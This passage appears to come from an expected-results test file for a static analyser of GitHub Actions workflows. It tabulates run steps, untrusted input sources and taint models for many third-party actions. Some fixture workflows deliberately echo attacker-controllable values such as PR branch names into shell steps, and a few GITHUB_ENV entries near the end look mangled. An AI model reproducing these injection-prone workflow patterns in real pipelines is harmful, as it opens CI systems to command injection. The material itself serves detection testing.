.github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:46:111 | .github/workflows/poisonable_steps.yml@5:5:46:111 | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:11:53:11:75 | .github/workflows/poisonable_steps.yml@11:53:11:75 | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:14:13:32 | .github/workflows/poisonable_steps.yml@13:14:13:32 | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:14:14:42 | .github/workflows/poisonable_steps.yml@14:14:14:42 | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:14:15:41 | .github/workflows/poisonable_steps.yml@15:14:15:41 | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:14:16:42 | .github/workflows/poisonable_steps.yml@16:14:16:42 | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:14:17:32 | .github/workflows/poisonable_steps.yml@17:14:17:32 | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:14:18:36 | .github/workflows/poisonable_steps.yml@18:14:18:36 | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:14:19:44 | .github/workflows/poisonable_steps.yml@19:14:19:44 | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:14:20:56 | .github/workflows/poisonable_steps.yml@20:14:20:56 | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:14:21:56 | .github/workflows/poisonable_steps.yml@21:14:21:56 | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:14:22:40 | .github/workflows/poisonable_steps.yml@22:14:22:40 | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:14:23:50 | .github/workflows/poisonable_steps.yml@23:14:23:50 | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:9:25:6 | .github/workflows/poisonable_steps.yml@24:9:25:6 | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:14:24:29 | .github/workflows/poisonable_steps.yml@24:14:24:29 | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:9:26:6 | .github/workflows/poisonable_steps.yml@25:9:26:6 | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:14:25:73 | .github/workflows/poisonable_steps.yml@25:14:25:73 | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:9:27:6 | .github/workflows/poisonable_steps.yml@26:9:27:6 | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:14:26:78 | .github/workflows/poisonable_steps.yml@26:14:26:78 | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:9:28:6 | .github/workflows/poisonable_steps.yml@27:9:28:6 | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:9:30:6 | .github/workflows/poisonable_steps.yml@29:9:30:6 | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:9:31:6 | .github/workflows/poisonable_steps.yml@30:9:31:6 | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:14:30:46 | .github/workflows/poisonable_steps.yml@30:14:30:46 | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:9:32:6 | .github/workflows/poisonable_steps.yml@31:9:32:6 | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:14:31:44 | .github/workflows/poisonable_steps.yml@31:14:31:44 | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:9:33:6 | .github/workflows/poisonable_steps.yml@32:9:33:6 | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:14:32:44 | .github/workflows/poisonable_steps.yml@32:14:32:44 | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:9:34:6 | .github/workflows/poisonable_steps.yml@33:9:34:6 | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:14:33:35 | .github/workflows/poisonable_steps.yml@33:14:33:35 | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:9:35:6 | .github/workflows/poisonable_steps.yml@34:9:35:6 | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:14:34:52 | .github/workflows/poisonable_steps.yml@34:14:34:52 | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:9:36:6 | .github/workflows/poisonable_steps.yml@35:9:36:6 | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:14:35:26 | .github/workflows/poisonable_steps.yml@35:14:35:26 | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:9:37:6 | .github/workflows/poisonable_steps.yml@36:9:37:6 | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:14:36:86 | .github/workflows/poisonable_steps.yml@36:14:36:86 | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:9:38:6 | .github/workflows/poisonable_steps.yml@37:9:38:6 | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:14:37:51 | .github/workflows/poisonable_steps.yml@37:14:37:51 | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:9:39:6 | .github/workflows/poisonable_steps.yml@38:9:39:6 | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:9:42:6 | .github/workflows/poisonable_steps.yml@41:9:42:6 | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:9:46:111 | .github/workflows/poisonable_steps.yml@42:9:46:111 | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:14:46:111 | .github/workflows/poisonable_steps.yml@42:14:46:111 | -| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:44:32:44:50 | .github/workflows/poisonable_steps.yml@44:32:44:50 | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | -scopes -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/test.yml:1:1:40:53 | on: push | -sources -| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES | filename | manual | -| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES_EXTENSIONS | filename | manual | -| Rishabh510/Path-lister-action | * | output.paths | filename | manual | -| WyriHaximus/github-action-files-in-commit | * | output.files | filename | manual | -| ab185508/file-type-finder | * | output.extaddpaths | filename | manual | -| ab185508/file-type-finder | * | output.names | filename | manual | -| ab185508/file-type-finder | * | output.paths | filename | manual | -| ahmadnassri/action-changed-files | * | output.files | filename | manual | -| ahmadnassri/action-changed-files | * | output.json | json | manual | -| alessbell/pull-request-comment-branch | * | output.head_ref | branch | manual | -| amannn/action-semantic-pull-request | * | output.error_message | text | manual | -| ankitjain28may/list-files-in-pr | * | output.pullRequestFiles | filename | manual | -| cypress-io/github-action | * | env.GH_BRANCH | branch | manual | -| dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | -| eficode/resolve-pr-refs | * | output.head_ref | branch | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | -| googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | -| gotson/pull-request-comment-branch | * | output.head_ref | branch | manual | -| jitterbit/get-changed-files | * | output.added | filename | manual | -| jitterbit/get-changed-files | * | output.added_modified | filename | manual | -| jitterbit/get-changed-files | * | output.all | filename | manual | -| jitterbit/get-changed-files | * | output.deleted | filename | manual | -| jitterbit/get-changed-files | * | output.modified | filename | manual | -| jitterbit/get-changed-files | * | output.removed | filename | manual | -| jitterbit/get-changed-files | * | output.renamed | filename | manual | -| jsmith/changes-since-last-tag | * | output.added | filename | manual | -| jsmith/changes-since-last-tag | * | output.files | filename | manual | -| jsmith/changes-since-last-tag | * | output.modified | filename | manual | -| jsmith/changes-since-last-tag | * | output.removed | filename | manual | -| jsmith/changes-since-last-tag | * | output.renamed | filename | manual | -| karpikpl/list-changed-files-action | * | output.changed_files | filename | manual | -| khan/pull-request-comment-trigger | * | output.comment_body | text | manual | -| knu/changed-files | * | output.changed_files | filename | manual | -| knu/changed-files | * | output.changed_files_json | filename | manual | -| knu/changed-files | * | output.matched_files | filename | manual | -| knu/changed-files | * | output.matched_files_json | filename | manual | -| lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | -| lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | -| lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | -| lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | -| marocchino/on_artifact | * | output.* | artifact | manual | -| martinhaintz/ga-file-list | * | output.file_names | filename | manual | -| martinhaintz/ga-file-list | * | output.files | filename | manual | -| peter-murray/issue-body-parser-action | * | output.* | text | manual | -| potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | -| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | -| redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | -| the-coding-turtle/ga-file-list | * | output.file_names | filename | manual | -| the-coding-turtle/ga-file-list | * | output.files | filename | manual | -| tj-actions/branch-names | * | output.current_branch | branch | manual | -| tj-actions/branch-names | * | output.head_ref_branch | branch | manual | -| trilom/file-changes-action | * | output.files | filename | manual | -| trilom/file-changes-action | * | output.files_added | filename | manual | -| trilom/file-changes-action | * | output.files_modified | filename | manual | -| trilom/file-changes-action | * | output.files_removed | filename | manual | -| tzkhan/pr-update-action | * | output.headMatch | branch | manual | -| w3f/action-find-old-files | * | output.files | filename | manual | -| xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | -| yumemi-inc/changed-files | * | output.files | filename | manual | -summaries -| ActionsTools/read-json-action | * | artifact | output.* | taint | manual | -| BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | -| Reedyuk/read-properties | * | artifact | output.value | taint | manual | -| SebRollen/toml-action | * | artifact | output.value | taint | manual | -| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | -| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | -| andstor/file-reader-action | * | artifact | output.contents | taint | manual | -| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | -| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | -| artlaman/conventional-changelog-reader-action | * | artifact | output.* | taint | manual | -| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | -| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | -| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | -| bfren/read-file | * | artifact | output.contents | taint | manual | -| bobheadxi/deployments | * | input.env | output.env | taint | manual | -| browniebroke/read-nvmrc-action | * | artifact | output.node_version | taint | manual | -| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| c-py/action-dotenv-to-setenv | * | artifact | output.* | taint | manual | -| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | -| christian-draeger/read-properties | * | artifact | output.* | taint | manual | -| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | -| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | -| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | -| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | -| dangdennis/toml-action | * | artifact | output.value | taint | manual | -| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | -| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | -| drawpile/drawpile | * | input.path | output.path | taint | manual | -| duskmoon314/action-load-env | * | artifact | output.* | taint | manual | -| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | -| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | -| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | -| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | -| gagle/package-version | * | artifact | output.version | taint | manual | -| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | -| getsentry/action-release | * | input.version | output.version | taint | manual | -| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | -| github/codeql-action | * | input.output | output.sarif-output | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | -| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | -| guibranco/github-file-reader-action-v2 | * | artifact | output.contents | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | -| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | -| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | -| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | -| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | -| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | -| igorskyflyer/action-readfile | * | artifact | output.content | taint | manual | -| jaywcjlove/github-action-read-file | * | artifact | output.content | taint | manual | -| jbutcher5/read-yaml | * | artifact | output.data | taint | manual | -| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | -| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | -| juliangruber/read-file-action | * | artifact | output.content | taint | manual | -| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | -| komorebitech/read-files-action | * | artifact | output.content | taint | manual | -| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | -| kurt-code/gha-properties | * | artifact | output.* | taint | manual | -| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | -| linkerd/linkerd2 | * | input.component | output.image | taint | manual | -| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | -| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | -| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | -| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | -| madhead/read-java-properties | * | artifact | output.* | taint | manual | -| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | -| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | -| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | -| mindsers/changelog-reader-action | * | artifact | output.* | taint | manual | -| miraai/read-helm-chart-yaml | * | artifact | output.* | taint | manual | -| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | -| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | -| nichmor/minimal-read-yaml | * | artifact | output.* | taint | manual | -| novuhq/novu | * | input.docker_name | output.image | taint | manual | -| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | -| pietrobolcato/action-read-yaml | * | artifact | output.* | taint | manual | -| rexdefuror/read-package-json | * | artifact | env.* | taint | manual | -| romanlamsal/dotenv-concat | * | artifact | output.* | taint | manual | -| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | -| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | -| sammcj/dotenv-output-action | * | artifact | output.* | taint | manual | -| satya-500/read-file-github-action | * | artifact | output.contents | taint | manual | -| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | -| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | -| simonblund/version-reader | * | artifact | output.version | taint | manual | -| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | -| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | -| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | -| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | -| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | -| traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | -| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | -calls -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | actions/github-script | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | -needs -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -testNormalizeExpr -| foo['bar'] == baz | foo.bar == baz | -| github.event.pull_request.user["login"] | github.event.pull_request.user.login | -| github.event.pull_request.user['login'] | github.event.pull_request.user.login | -| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | -writeToGitHubEnv1 -| JSON_RESPONSE<> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}) | PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV})\nEOF | -| VAR0 | $TITLE | VAR0<> $GITHUB_ENV) | VAR3<> $GITHUB_ENV)\nEOF | -| VAR6 | ${ISSUE_BODY3} | VAR6=${ISSUE_BODY3} | -| VAR7 | Hello\nWorld | VAR7<> $GITHUB_ENV + + - name: Test formalities + run: 